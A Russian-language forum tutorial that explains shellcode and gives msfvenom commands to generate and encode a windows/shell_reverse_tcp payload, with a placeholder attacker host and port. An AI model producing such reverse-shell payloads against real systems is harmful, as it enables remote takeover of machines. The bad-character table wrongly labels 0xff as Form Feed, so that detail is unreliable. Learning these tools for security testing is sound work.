• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Гостевая статья Создание кода Shellcode с помощью msfvenom

  • Автор темы Автор темы Vlad
  • Дата начала Дата начала

Vlad

Green Team
28.01.2019
92
27
Shellcode.png


Msfvenom представляет собой комбинацию msfpayload и msfencode, объединяя оба эти инструмента в одном экземпляре Framework.

Что такое шеллкод?

При взломе шеллкод - это небольшой фрагмент кода, который используется в качестве полезной нагрузки при использовании уязвимости программного обеспечения. Он называется «шеллкод», потому что он обычно запускает командную оболочку, из которой злоумышленник может управлять скомпрометированной машиной, но любой фрагмент кода, выполняющий аналогичную задачу, может называться шеллкодом.

Вы можете написать свой собственный шелл-код и использовать некоторые инструменты для их генерации, msfvenom является одним из таких инструментов, с помощью которого вы можете генерировать шелл-код.

Команда:
Код:
msfvenom -h

Для этого урока мы выбрали полезную нагрузку windows / shell_reverse_tcp для генерации нашего шелл-кода,

Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST= yourip LPORT=listeningport -f c

Вы увидите, что ваш шелл-код генерируется msfvenom, следующим шагом будет удаление плохих символов, так что наш шелл-код выполняется так, как мы хотим, плохие символы являются простыми символами, которые в основном завершают наш код, прежде чем он будет полностью исполнен.

Общие плохие знаки
0x00 NULL (\0)
0x09 Tab (\t)
0x0a Line Feed (\n)
0x0d Carriage Return (\r)
0xff Form Feed (\f)


Чтобы удалить неправильные символы, мы должны кодировать их с помощью какого-то кодировщика, в этом учебном пособии мы использовали shikata_gai_nai кодировщик.

Команда:

Код:
msfvenom -p windows/shell_reverse_tcp LHOST=yourip LPORT=listeningport -f c  -e x86/shikata_ga_nai -b “\x00”


 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы